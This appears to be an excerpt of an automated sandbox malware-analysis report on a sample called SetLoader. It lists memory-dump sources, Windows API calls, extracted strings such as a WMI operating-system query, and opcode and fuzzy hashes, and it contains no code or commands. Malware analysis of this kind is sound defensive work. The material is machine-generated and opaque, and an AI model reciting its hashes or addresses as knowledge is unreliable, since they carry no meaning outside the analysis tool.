                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e19129c9880f5c7b42afde99e85688049f23b2bc4a126f5b486ccba3698fed8f
                                              • Instruction ID: ca452212d6ac327ea74f72d5a5f3c246e718dd6371bd4f5a40e582c8bcfdb882
                                              • Opcode Fuzzy Hash: e19129c9880f5c7b42afde99e85688049f23b2bc4a126f5b486ccba3698fed8f
                                              • Instruction Fuzzy Hash: 8E51CEB1A087119FC748CF29D88055AF7E1BF88314F058A2EF899E7740DB30E955CB9A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a36805445e229c2b90d29c9fa108318b87a70c956e41b8f0a663b46aa5c9b3d3
                                              • Instruction ID: eb41902408db10bfb5767cd37dfb00cbf9a23aaa5e09f827d495c82ce8229844
                                              • Opcode Fuzzy Hash: a36805445e229c2b90d29c9fa108318b87a70c956e41b8f0a663b46aa5c9b3d3
                                              • Instruction Fuzzy Hash: 3631EEB1614B268FCB24EF28C8512AEBBD2EB95310F14492DF496C7342C734E949CF96
                                              APIs
                                              • _swprintf.LIBCMT ref: 00620284
                                                • Part of subcall function 00614C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00614C13
                                                • Part of subcall function 00623F47: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,006202A0,?,00000000,00000000,?,?,?,006202A0,?,?,00000050), ref: 00623F64
                                              • _strlen.LIBCMT ref: 006202A5
                                              • SetDlgItemTextW.USER32(?,00652274,?), ref: 006202FE
                                              • GetWindowRect.USER32(?,?), ref: 00620334
                                              • GetClientRect.USER32(?,?), ref: 00620340
                                              • GetWindowLongW.USER32(?,000000F0), ref: 006203EB
                                              • GetWindowRect.USER32(?,?), ref: 0062041B
                                              • SetWindowTextW.USER32(?,?), ref: 0062044A
                                              • GetSystemMetrics.USER32(00000008), ref: 00620452
                                              • GetWindow.USER32(?,00000005), ref: 0062045D
                                              • GetWindowRect.USER32(00000000,?), ref: 0062048D
                                              • GetWindow.USER32(00000000,00000002), ref: 006204FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                              • String ID: $%s:$CAPTION$d$t"e
                                              • API String ID: 2407758923-2164488584
                                              • Opcode ID: b6be0199a911d60df29bf25600a41befa79dfed851db467771c8745e5ffa21f7
                                              • Instruction ID: 24710fa31f022407f86cd55dcbde4076c002e2139fe4d54549a6c58b4efffd90
                                              • Opcode Fuzzy Hash: b6be0199a911d60df29bf25600a41befa79dfed851db467771c8745e5ffa21f7
                                              • Instruction Fuzzy Hash: 5C81AE72508301AFD714DF68DE89A6FBBEAEB88704F04192DF985D3251D734E948CB52
                                              APIs
                                              • ___free_lconv_mon.LIBCMT ref: 0063F1B6
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063ED6E
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063ED80
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063ED92
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EDA4
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EDB6
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EDC8
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EDDA
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EDEC
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EDFE
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EE10
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EE22
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EE34
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EE46
                                              • _free.LIBCMT ref: 0063F1AB
                                                • Part of subcall function 0063BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?), ref: 0063BB10
                                                • Part of subcall function 0063BAFA: GetLastError.KERNEL32(?,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?,?), ref: 0063BB22
                                              • _free.LIBCMT ref: 0063F1CD
                                              • _free.LIBCMT ref: 0063F1E2
                                              • _free.LIBCMT ref: 0063F1ED
                                              • _free.LIBCMT ref: 0063F20F
                                              • _free.LIBCMT ref: 0063F222
                                              • _free.LIBCMT ref: 0063F230
                                              • _free.LIBCMT ref: 0063F23B
                                              • _free.LIBCMT ref: 0063F273
                                              • _free.LIBCMT ref: 0063F27A
                                              • _free.LIBCMT ref: 0063F297
                                              • _free.LIBCMT ref: 0063F2AF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                              • String ID: h)e
                                              • API String ID: 161543041-3223013814
                                              • Opcode ID: d26d7b4c7c0adedc733d47cdd517634f85f7cea3dca1d1154a391df125744c32
                                              • Instruction ID: 8a5f647c11504115317f6373f83bd75f1a7f2405debf94811ef243f01f139c40
                                              • Opcode Fuzzy Hash: d26d7b4c7c0adedc733d47cdd517634f85f7cea3dca1d1154a391df125744c32
                                              • Instruction Fuzzy Hash: 5C315931A00601DFEBA0AB79DC45BD6B3EAFF00710F205529E54AD7291DF71AD408BA4
                                              APIs
                                              • _wcslen.LIBCMT ref: 0062B656
                                              • _wcslen.LIBCMT ref: 0062B6F6
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 0062B705
                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 0062B726
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                              • String ID: FjuKc$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                              • API String ID: 1116704506-1915944190
                                              • Opcode ID: 92c347ccc3fac90477e3a762a8627e93b1eb5f25fa3e9ebacafa23be9a5741cb
                                              • Instruction ID: 4f1cb3a71cd56bf20931a6123b1f2961a1460e377ab6b2611390a663e146c0c2
                                              • Opcode Fuzzy Hash: 92c347ccc3fac90477e3a762a8627e93b1eb5f25fa3e9ebacafa23be9a5741cb
                                              • Instruction Fuzzy Hash: F43128321087217FE725AB34EC06FAF779EDF92310F14151EF401962C2FBA499458BAA
                                              APIs
                                              • _free.LIBCMT ref: 0063B8C5
                                                • Part of subcall function 0063BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?), ref: 0063BB10
                                                • Part of subcall function 0063BAFA: GetLastError.KERNEL32(?,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?,?), ref: 0063BB22
                                              • _free.LIBCMT ref: 0063B8D1
                                              • _free.LIBCMT ref: 0063B8DC
                                              • _free.LIBCMT ref: 0063B8E7
                                              • _free.LIBCMT ref: 0063B8F2
                                              • _free.LIBCMT ref: 0063B8FD
                                              • _free.LIBCMT ref: 0063B908
                                              • _free.LIBCMT ref: 0063B913
                                              • _free.LIBCMT ref: 0063B91E
                                              • _free.LIBCMT ref: 0063B92C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: ea74c479f3fef12b9eb935bd9d856e5eb435b6a97195728ac563c465747e375a
                                              • Instruction ID: 6b0896b8e87591b9aefcfb3bf6695648c31d6b6c3b8b0485a6dbd766174b2c7a
                                              • Opcode Fuzzy Hash: ea74c479f3fef12b9eb935bd9d856e5eb435b6a97195728ac563c465747e375a
                                              • Instruction Fuzzy Hash: 6911A47A500548AFCB41EF59CD92CD93BBAEF04750F0190A9FA098B222DB71EA51DBD4
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                              • String ID: csm$csm$csm
                                              • API String ID: 322700389-393685449
                                              • Opcode ID: cf7b49b86435d14105b3b02a01bc218001162991cd01f76402ee75f5c43b1fc1
                                              • Instruction ID: 4b445d5352b660713e369ca00b0954adfdd2f22eec0078e83e2f43d87be2949d
                                              • Opcode Fuzzy Hash: cf7b49b86435d14105b3b02a01bc218001162991cd01f76402ee75f5c43b1fc1
                                              • Instruction Fuzzy Hash: BDB14771800A09EFCF29DFA4C8819AEBBB6FF14310F14455AE8166B212D731EA61CFD5
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ClearH_prolog3Variant
                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$fc
                                              • API String ID: 3629354427-1430094071
                                              • Opcode ID: 73ef7c127c10c04490dd56b8a215f0502f60f9db54d46af18347c8ae75510b0e
                                              • Instruction ID: ffa0884adcd11383ade9a576fa73c0f189266f5a50bbd597d7b3649204147770
                                              • Opcode Fuzzy Hash: 73ef7c127c10c04490dd56b8a215f0502f60f9db54d46af18347c8ae75510b0e
                                              • Instruction Fuzzy Hash: 6A714D74A40219AFDB14DFA4CC94DAFB7BAFF49720B18016DF506A72A0CB74AD42CB51
                                              APIs
                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00642452,00000000,00000000,00000000,00000000,00000000,?), ref: 00641D1F
                                              • __fassign.LIBCMT ref: 00641D9A
                                              • __fassign.LIBCMT ref: 00641DB5
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00641DDB
                                              • WriteFile.KERNEL32(?,00000000,00000000,R$d,00000000,?,?,?,?,?,?,?,?,?,00642452,00000000), ref: 00641DFA
                                              • WriteFile.KERNEL32(?,00000000,00000001,R$d,00000000,?,?,?,?,?,?,?,?,?,00642452,00000000), ref: 00641E33
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                              • String ID: R$d
                                              • API String ID: 1324828854-726558507
                                              • Opcode ID: 32bdba11bdda2bda9d21adac012a68fc435401faa5d18ec22ff7cb7383cbe0fc
                                              • Instruction ID: a88f638868128de80bdf975558b4af3149f61edcf9504e6e14c3f3e759e05b50
                                              • Opcode Fuzzy Hash: 32bdba11bdda2bda9d21adac012a68fc435401faa5d18ec22ff7cb7383cbe0fc
                                              • Instruction Fuzzy Hash: D4518375A002499FDB14CFA8D845AEEBBFAFF0A300F14455AE965EB252D730D981CB60
                                              APIs
                                              • _wcslen.LIBCMT ref: 0061BFA3
                                                • Part of subcall function 006234D7: GetSystemTime.KERNEL32(?,00000000), ref: 006234EF
                                                • Part of subcall function 006234D7: SystemTimeToFileTime.KERNEL32(?,?), ref: 006234FD
                                                • Part of subcall function 00623480: __aulldiv.LIBCMT ref: 00623489
                                              • __aulldiv.LIBCMT ref: 0061BFCF
                                              • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,?,?), ref: 0061BFD6
                                              • _swprintf.LIBCMT ref: 0061C001
                                                • Part of subcall function 00614C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00614C13
                                              • _wcslen.LIBCMT ref: 0061C00B
                                              • _swprintf.LIBCMT ref: 0061C061
                                              • _wcslen.LIBCMT ref: 0061C06B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
                                              • String ID: %u.%03u
                                              • API String ID: 2956649372-1114938957
                                              • Opcode ID: 8ef5e5e686d0f9e190751fc52cd4c219a2deb219ea9115228009fe7c48846f89
                                              • Instruction ID: 6f4238df530710864663439701c2d48fab117647542d5ca331c3215479143906
                                              • Opcode Fuzzy Hash: 8ef5e5e686d0f9e190751fc52cd4c219a2deb219ea9115228009fe7c48846f89
                                              • Instruction Fuzzy Hash: 37218272A04340AFC754EF64CC45EAF77DEEB89750F44491DF448D3242DA35D9488796
                                              APIs
                                              • GetWindow.USER32(?,00000005), ref: 0062FA20
                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 0062FA4C
                                                • Part of subcall function 00624168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0061E084,00000000,.exe,?,?,00000800,?,?,?,0062AD5D), ref: 0062417E
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0062FA68
                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0062FA7F
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0062FA93
                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0062FABC
                                              • GetWindow.USER32(00000000,00000002), ref: 0062FACC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Window$MessageSend$ClassCompareLongNameObjectString
                                              • String ID: STATIC
                                              • API String ID: 2673288236-1882779555
                                              • Opcode ID: 0cb28d1c67d81ad1d9091dda71a198569d073d1727bb7abcd70076edc6049dad
                                              • Instruction ID: b0470b2853397878a462838573e6f81078811086912d5686ddd6de64f5653f04
                                              • Opcode Fuzzy Hash: 0cb28d1c67d81ad1d9091dda71a198569d073d1727bb7abcd70076edc6049dad
                                              • Instruction Fuzzy Hash: D3213D72544B20BBE320AB30AC46FEF37AEAF48710F040439F949A6191DB74D9414FE9
                                              APIs
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0062CBEE
                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0062CC05
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0062CC19
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0062CC2A
                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0062CC42
                                              • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 0062CC66
                                              • _swprintf.LIBCMT ref: 0062CC85
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
                                              • String ID: %s %s
                                              • API String ID: 385609497-2939940506
                                              • Opcode ID: 1d19cb510c9ee8456bc23a46fb4af6fda9f60839b0903dab24a6aabaef668083
                                              • Instruction ID: 82fb05ececbaa0de9b8b8694fee1b0fcc8b9579c3b7cb5ef61314802b34fd80b
                                              • Opcode Fuzzy Hash: 1d19cb510c9ee8456bc23a46fb4af6fda9f60839b0903dab24a6aabaef668083
                                              • Instruction Fuzzy Hash: 74214CB690024CABDB20DFA4DD44EEF77BDEF0A304F00456AFA09D7112E6309A05CB61
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,0061CEA9,0061CEAB,00000000,00000000,5CB4B331,00000001,00000000,00000000,?,0061CD87,?,00000004,0061CEA9,ROOT\CIMV2), ref: 006323E9
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,0061CEA9,?,00000000,00000000,?,?,0061CD87,?,00000004,0061CEA9), ref: 00632464
                                              • SysAllocString.OLEAUT32(00000000), ref: 0063246F
                                              • _com_issue_error.COMSUPP ref: 00632498
                                              • _com_issue_error.COMSUPP ref: 006324A2
                                              • GetLastError.KERNEL32(80070057,5CB4B331,00000001,00000000,00000000,?,0061CD87,?,00000004,0061CEA9,ROOT\CIMV2), ref: 006324A7
                                              • _com_issue_error.COMSUPP ref: 006324BA
                                              • GetLastError.KERNEL32(00000000,?,0061CD87,?,00000004,0061CEA9,ROOT\CIMV2), ref: 006324D0
                                              • _com_issue_error.COMSUPP ref: 006324E3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                              • String ID:
                                              • API String ID: 1353541977-0
                                              • Opcode ID: c8ef701a04042d5efcfafb02b1bef4b438b96acd466f1985f78167d54e766a90
                                              • Instruction ID: a35b30f8182b61cc8a0aaef0340ab34e4282ce706332fe244e1a138097b659e4
                                              • Opcode Fuzzy Hash: c8ef701a04042d5efcfafb02b1bef4b438b96acd466f1985f78167d54e766a90
                                              • Instruction Fuzzy Hash: 0141F6B1A00316ABDB10DF68DC55BEEBBEAEB49710F10822DF505E7391DB35990087E9
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: __alldvrm$_strrchr
                                              • String ID: =zc$=zc$=zc
                                              • API String ID: 1036877536-3470228471
                                              • Opcode ID: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
                                              • Instruction ID: d7e2a85226591d07fe5d35e5c93f0e7c66342c712a39ac589a8dba35fe547e40
                                              • Opcode Fuzzy Hash: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
                                              • Instruction Fuzzy Hash: BFA147729007869FEB25CF68C8917EEBBE6EF52360F18416DF485AB342C6358941C7D4
                                              APIs
                                              • _ValidateLocalCookies.LIBCMT ref: 00634F57
